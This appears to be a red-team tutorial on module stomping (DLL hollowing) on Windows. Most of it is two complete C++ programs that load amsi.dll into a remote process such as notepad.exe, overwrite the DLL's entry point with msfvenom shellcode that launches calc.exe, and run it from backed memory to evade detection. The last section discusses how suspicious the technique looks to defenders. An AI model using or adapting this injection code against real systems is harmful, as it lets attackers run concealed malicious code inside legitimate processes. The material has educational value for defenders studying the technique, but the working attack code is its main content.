Module Stomping

Module stomping is a form of DLL injection. However, we inject a legitimate DLL into a remote process then overwrite the DLL’s code. The benefit of this technique is our shellcode will be executed from a region of backed memory (i.e a memory region within the range of a loaded module). Module stomping is sometimes referred to as DLL hollowing.

There are a couple of ways to carry this out. First, let’s look at performing module stomping using LoadLibraryA.


LoadLibraryA Module Stomping

The following steps need to occur;

  • Get a handle to the remote process using OpenProcess
  • Allocate memory with VirtualAlloc, and write out the name of the legitimate DLL we want to load using WriteProcessMemory
  • Use CreateRemoteThread to execute LoadLibraryA, using a pointer to our DLL name as it’s parameter
  • Retrieve the DLL entry point for the module we just loaded.
  • Use WriteProcessMemory to overwrite the DLL entry point with our shellcode
  • Use CreateRemoteThread again with the DLL entry point

The below code implements these steps.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <iostream>
#include <TlHelp32.h>
#include <Psapi.h>
#include <tchar.h>

using namespace std;

DWORD_PTR GetRemoteDllLoadAddress(HANDLE hProcess, const TCHAR* dllName) {


    if (hProcess == NULL) {
        std::cerr << "Invalid process handle." << std::endl;
        return 0;
    }

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, GetProcessId(hProcess));
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed to create snapshot." << std::endl;
        return 0;
    }

    MODULEENTRY32 me32;
    me32.dwSize = sizeof(MODULEENTRY32);
    DWORD_PTR loadAddress = 0;

    if (Module32First(hSnapshot, &me32)) {
        do {
            if (_tcsicmp(me32.szModule, dllName) == 0) {
                loadAddress = (DWORD_PTR)me32.modBaseAddr;
                break;
            }
        } while (Module32Next(hSnapshot, &me32));
    }

    CloseHandle(hSnapshot);
    return loadAddress;
}


DWORD_PTR GetRemoteDllEntryPoint(HANDLE hProcess, DWORD_PTR loadAddress) {
    if (hProcess == NULL || loadAddress == 0) {
        std::cerr << "Invalid process handle or load address." << std::endl;
        return 0;
    }

    // Read DOS header from remote process
    IMAGE_DOS_HEADER dosHeader;
    SIZE_T bytesRead;
    if (!ReadProcessMemory(hProcess, (LPCVOID)loadAddress, &dosHeader, sizeof(IMAGE_DOS_HEADER), &bytesRead) || bytesRead != sizeof(IMAGE_DOS_HEADER)) {
        std::cerr << "Failed to read DOS header." << std::endl;
        return 0;
    }

    // Validate DOS header
    if (dosHeader.e_magic != IMAGE_DOS_SIGNATURE) {
        std::cerr << "Invalid DOS header." << std::endl;
        return 0;
    }

    // Read NT headers from remote process
    IMAGE_NT_HEADERS ntHeaders;
    if (!ReadProcessMemory(hProcess, (LPCVOID)(loadAddress + dosHeader.e_lfanew), &ntHeaders, sizeof(IMAGE_NT_HEADERS), &bytesRead) || bytesRead != sizeof(IMAGE_NT_HEADERS)) {
        std::cerr << "Failed to read NT headers." << std::endl;
        return 0;
    }

    // Validate NT headers
    if (ntHeaders.Signature != IMAGE_NT_SIGNATURE) {
        std::cerr << "Invalid NT headers." << std::endl;
        return 0;
    }

    // Calculate and return entry point address
    return (DWORD_PTR)(loadAddress + ntHeaders.OptionalHeader.AddressOfEntryPoint);
}

int main(int argc, char* argv[]) {

    char sampleDLL[] = "C:\\windows\\system32\\amsi.dll";
    HANDLE process_handle;

    //Get a handle to our remote process
    process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));

    // Allocate memory in the remote process
    LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof(sampleDLL), (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);

    // Write our DLL name to the remote process
    WriteProcessMemory(process_handle, buffer, sampleDLL, sizeof(sampleDLL), NULL);

    //Retrieve the memory address of LoadLibraryA function
    HMODULE k32_handle = GetModuleHandle(L"Kernel32");
    VOID* load_library = GetProcAddress(k32_handle, "LoadLibraryA");

    //Execute the DLL in a new remote thread
    HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)load_library, buffer, 0, NULL);

    std::cout << "DLL Injected! Press ENTER to execute\n";
    getchar();

    const TCHAR* dllName = _T("amsi.dll"); // Specify the name of the DLL
    DWORD_PTR dllLoadAddress = GetRemoteDllLoadAddress(process_handle, dllName);
    if (dllLoadAddress != 0) {
        std::cout << "Load address of amsi.dll is " << ": 0x" << std::hex << dllLoadAddress << std::endl;
    }
    else {
        std::cerr << "Failed to find DLL load address." << std::endl;
    }

    DWORD_PTR entryPointAddress = GetRemoteDllEntryPoint(process_handle, dllLoadAddress);
    if (entryPointAddress != 0) {
        std::cout << "Entry point address of DLL in process " << ": 0x" << std::hex << entryPointAddress << std::endl;
    }
    else {
        std::cerr << "Failed to retrieve entry point address." << std::endl;
    }

    // msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
        "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
        "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
        "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
        "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
        "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
        "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
        "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
        "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
        "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
        "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
        "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
        "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";



    WriteProcessMemory(process_handle, reinterpret_cast<LPVOID>(entryPointAddress), (LPCVOID)shellcode, sizeof(shellcode), NULL);

    // execute shellcode from inside the benign DLL
    CreateRemoteThread(process_handle, NULL, 0, (PTHREAD_START_ROUTINE)entryPointAddress, NULL, 0, NULL);


    CloseHandle(process_handle);

    std::cout << "Execution complete\n";
    return 0;

}

It’s worth noting that the loaded DLL may be Control Flow Guard enabled, which effectively prevents us from executing from arbitrary locations in the target DLL. However, the entry point will always be executable 😃.


LoadLibraryExA Module Stomping

In the above example, we use LoadLibraryA. This does work, however every time the DLL is loaded, or unloaded our code will execute. This may not be ideal and lead to instability in the target process. To get around this, we can use LoadLibraryExA.

HMODULE LoadLibraryExA(
  [in] LPCSTR lpLibFileName,
       HANDLE hFile,
  [in] DWORD  dwFlags
);

The dwFlags option supports the value DONT_RESOLVE_DLL_REFERENCES, which appears to do what we want;

If this value is used, and the executable module is a DLL, the system does not call DllMain for process and thread initialization and termination. Also, the system does not load additional executable modules that are referenced by the specified module.

https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa

The problem with using LoadLibraryExA, is CreateRemoteThread only allows us to specify one argument to the target process, and we need to supply three. In order to do this, the following approach is taken;

  • Lookup the LoadLibraryExA Address in the remote process.
  • Allocate some memory in the remote process, and write a ASM stub code to set the additional function parameters we require
  • Call CreateRemoteThread, with a pointer to our ASM stub.

Our ASM stub will look something like this;

movabs rax, 0x000000000000000   - Replaced with LoadLibraryExA Address
mov    r8, 0x1                  - ARG2 
xor rdx, rdx                    - ARG1
jmp    rax      

When we call this stub using CreateRemoteThread, we can specifiy a single parameter (ARG0) that will end up in the RCX register. This will be a pointer to the DLL’s entrypoint.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <iostream>
#include <TlHelp32.h>
#include <Psapi.h>
#include <tchar.h>

using namespace std;

DWORD_PTR GetRemoteDllLoadAddress(HANDLE hProcess, const TCHAR* dllName) {


    if (hProcess == NULL) {
        std::cerr << "Invalid process handle." << std::endl;
        return 0;
    }

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, GetProcessId(hProcess));
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed to create snapshot." << std::endl;
        return 0;
    }

    MODULEENTRY32 me32;
    me32.dwSize = sizeof(MODULEENTRY32);
    DWORD_PTR loadAddress = 0;

    if (Module32First(hSnapshot, &me32)) {
        do {
            if (_tcsicmp(me32.szModule, dllName) == 0) {
                loadAddress = (DWORD_PTR)me32.modBaseAddr;
                break;
            }
        } while (Module32Next(hSnapshot, &me32));
    }

    CloseHandle(hSnapshot);
    return loadAddress;
}


DWORD_PTR GetRemoteDllEntryPoint(HANDLE hProcess, DWORD_PTR loadAddress) {
    if (hProcess == NULL || loadAddress == 0) {
        std::cerr << "Invalid process handle or load address." << std::endl;
        return 0;
    }

    // Read DOS header from remote process
    IMAGE_DOS_HEADER dosHeader;
    SIZE_T bytesRead;
    if (!ReadProcessMemory(hProcess, (LPCVOID)loadAddress, &dosHeader, sizeof(IMAGE_DOS_HEADER), &bytesRead) || bytesRead != sizeof(IMAGE_DOS_HEADER)) {
        std::cerr << "Failed to read DOS header." << std::endl;
        return 0;
    }

    // Validate DOS header
    if (dosHeader.e_magic != IMAGE_DOS_SIGNATURE) {
        std::cerr << "Invalid DOS header." << std::endl;
        return 0;
    }

    // Read NT headers from remote process
    IMAGE_NT_HEADERS ntHeaders;
    if (!ReadProcessMemory(hProcess, (LPCVOID)(loadAddress + dosHeader.e_lfanew), &ntHeaders, sizeof(IMAGE_NT_HEADERS), &bytesRead) || bytesRead != sizeof(IMAGE_NT_HEADERS)) {
        std::cerr << "Failed to read NT headers." << std::endl;
        return 0;
    }

    // Validate NT headers
    if (ntHeaders.Signature != IMAGE_NT_SIGNATURE) {
        std::cerr << "Invalid NT headers." << std::endl;
        return 0;
    }

    // Calculate and return entry point address
    return (DWORD_PTR)(loadAddress + ntHeaders.OptionalHeader.AddressOfEntryPoint);
}


LPVOID loadlibrary_gadget(void* ptr_load_libraryex, HANDLE process_handle)
{
    //Add the LoadLibraryExA instruction to our trampoline
    // 48 b8 00 00 00 00 00         movabs rax, 0x000000000000000   - LoadLibraryExA Address
    // 7 : 00 00 00
    // a : 49 c7 c0 01 00 00 00     mov    r8, 0x1                  - ARG2
    // 11 : 48 31 d2                xor rdx, rdx                    - ARG1
    // 14 : ff e0                   jmp    rax                      
    uint8_t load_libary_ex_instructions[] = 
{0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC0, 0x01, 0x00, 0x00, 0x00, 0x48, 0x31, 0xD2, 0xFF, 0xE0};
    memcpy(&load_libary_ex_instructions[2], &ptr_load_libraryex, sizeof(ptr_load_libraryex));
    // Allocate memory in remote process and write to it
    LPVOID gadget_buffer = VirtualAllocEx(process_handle, NULL, sizeof(load_libary_ex_instructions), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(process_handle, gadget_buffer, load_libary_ex_instructions, sizeof(load_libary_ex_instructions), NULL);
    return gadget_buffer;
}

DWORD GetProcessIdByName(const TCHAR* processName) {
    PROCESSENTRY32 processEntry;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return 0; // Unable to create snapshot
    }

    processEntry.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(hSnapshot, &processEntry)) {
        CloseHandle(hSnapshot);
        return 0; // Unable to get the first process
    }

    do {
        if (_tcsicmp(processEntry.szExeFile, processName) == 0) {
            CloseHandle(hSnapshot);
            return processEntry.th32ProcessID; // Found the process, return its PID
        }
    } while (Process32Next(hSnapshot, &processEntry));

    CloseHandle(hSnapshot);
    return 0; // Process not found
}

int main(int argc, char* argv[]) {

    HANDLE process_handle;

    //Get a handle to our remote process    
    const TCHAR* processName = _T("notepad.exe");
    DWORD pid = GetProcessIdByName(processName);
    process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

    // Allocate memory in the remote process
    char sampleDLL[] = "C:\\windows\\system32\\amsi.dll";
    LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof(sampleDLL), (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);

    // Write our DLL to the remote process
    WriteProcessMemory(process_handle, buffer, sampleDLL, sizeof(sampleDLL), NULL);

    //Retrieve the memory address of LoadLibraryA function
    HMODULE k32_handle = GetModuleHandle(L"Kernel32");
    VOID* load_library = GetProcAddress(k32_handle, "LoadLibraryExA");

    // Get a pointer to our LoadLibraryExA gadget
    std::cout << "LoadLibraryExA address " << ": 0x" << std::hex << load_library << std::endl;
    LPVOID gadget_buffer = loadlibrary_gadget(load_library, process_handle);
    std::cout << "Gadget buffer " << ": 0x" << std::hex << gadget_buffer << std::endl;

    HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)gadget_buffer, buffer, 0, NULL);
    std::cout << "DLL Injected! Press ENTER to execute\n";
    getchar();

    const TCHAR* dllName = _T("amsi.dll"); // Specify the name of the DLL
    DWORD_PTR dllLoadAddress = GetRemoteDllLoadAddress(process_handle, dllName);
    if (dllLoadAddress != 0) {
        std::cout << "Load address of amsi.dll is " << ": 0x" << std::hex << dllLoadAddress << std::endl;
    }
    else {
        std::cerr << "Failed to find DLL load address." << std::endl;
    }

    DWORD_PTR entryPointAddress = GetRemoteDllEntryPoint(process_handle, dllLoadAddress);
    if (entryPointAddress != 0) {
        std::cout << "Entry point address of DLL in process " << ": 0x" << std::hex << entryPointAddress << std::endl;
    }
    else {
        std::cerr << "Failed to retrieve entry point address." << std::endl;
    }

    // msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
        "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
        "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
        "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
        "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
        "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
        "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
        "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
        "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
        "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
        "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
        "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
        "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";


    WriteProcessMemory(process_handle, reinterpret_cast<LPVOID>(entryPointAddress), (LPCVOID)shellcode, sizeof(shellcode), NULL);

    // execute shellcode from inside the benign DLL
    CreateRemoteThread(process_handle, NULL, 0, (PTHREAD_START_ROUTINE)entryPointAddress, NULL, 0, NULL);


    CloseHandle(process_handle);

    std::cout << "Execution complete\n";
    return 0;

}

In Conclusion

LoadLibraryExA module stomping does prevent the issue of the payload being executed multiple times, however it requires using VirtualAlloc to allocate unbacked memory in the remote process which in itself may be suspicious. An alternative may be implementing a mutex in the payload to ensure only one instance executes at a time.